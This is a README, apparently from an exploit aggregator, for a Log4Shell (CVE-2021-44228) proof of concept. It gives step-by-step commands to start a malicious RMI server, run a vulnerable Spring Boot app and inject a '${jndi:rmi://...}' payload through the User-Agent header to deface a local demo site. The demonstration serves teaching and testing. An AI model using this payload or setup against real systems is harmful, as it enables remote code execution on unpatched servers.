Share
## https://sploitus.com/exploit?id=7A08E5FB-C04B-5713-B137-D7EDB27F389E
# Demonstration of the Log4jShell Exploit

This code may contain malware and is known to contain vulnerabilities. 
Use at your own risk - if you use it, be advised to do that in a VM  - discard the VM after use.

# log4shell-poc

This is a proof of concept for the Log4j vulnerability (CVE-2021-44228), that works by evaluating an expression that pulls external code via JNDI over RMI.

It leverages Log4j 2.5.7 from spring-boot-starter-log4j2

This repository and the exploit is heavily inspired by [Labout/log4shell-rmi-poc](https://github.com/Labout/log4shell-rmi-poc), but updated and adopted to modern Java versions.

## Requirements:

No requirements, except Java.
The code has been tested with Java 8 (JDK 1.8.0_25), Java 11 (JDK 11.0.1) and Java 19 (openjdk 19.0.2)

## How to run the POC

### 1. Clone the repo:

```bash
git clone https://github.com/rhuss/log4shell-poc.git
```

### 2. Start the attacker RMI Server

```bash
cd inject-server
./startRmiServer.sh 
```

You should get something like this:

```
a target/classes/static
a target/classes/static/index.html
a target/classes/static/img
a target/classes/static/img/wc.png
Starting malicious RMI Server
Creating evil RMI registry on port 1099
Bind remote exploit to 'WannaCry'
```

### 3. Start the vulnerable Log4j application (a simple spring boot application)

In a new Terminal 

```bash
cd vulnerable-app
./startVulnerableService.sh
```

### 4. Show the original site (a dummy web-site)

```bash
open http://localhost:8080
```

The original website is opened in your browser.


### 5. Inject a vulnerable JNDI over the "User-Agent" header 

```bash
curl http://localhost:8080 --header 'User-Agent: ${jndi:rmi://127.0.0.1:1099/WannaCry}'
```

The website gets updated with the data provided from malicious RMI server that has been started in the first step.

> [!NOTE]
> To protect against real exploitation, this must be done from a client located at 127.0.0.1.

### 6. Show the now hacked site

```bash
open http://localhost:8080
```

(or just reload the previous page in your browser). The hacked website is returned.

## References 

* https://github.com/Labout/log4shell-rmi-poc
* https://www.cisecurity.org/log4j-zero-day-vulnerability-response/
* https://www.lunasec.io/docs/blog/log4j-zero-day/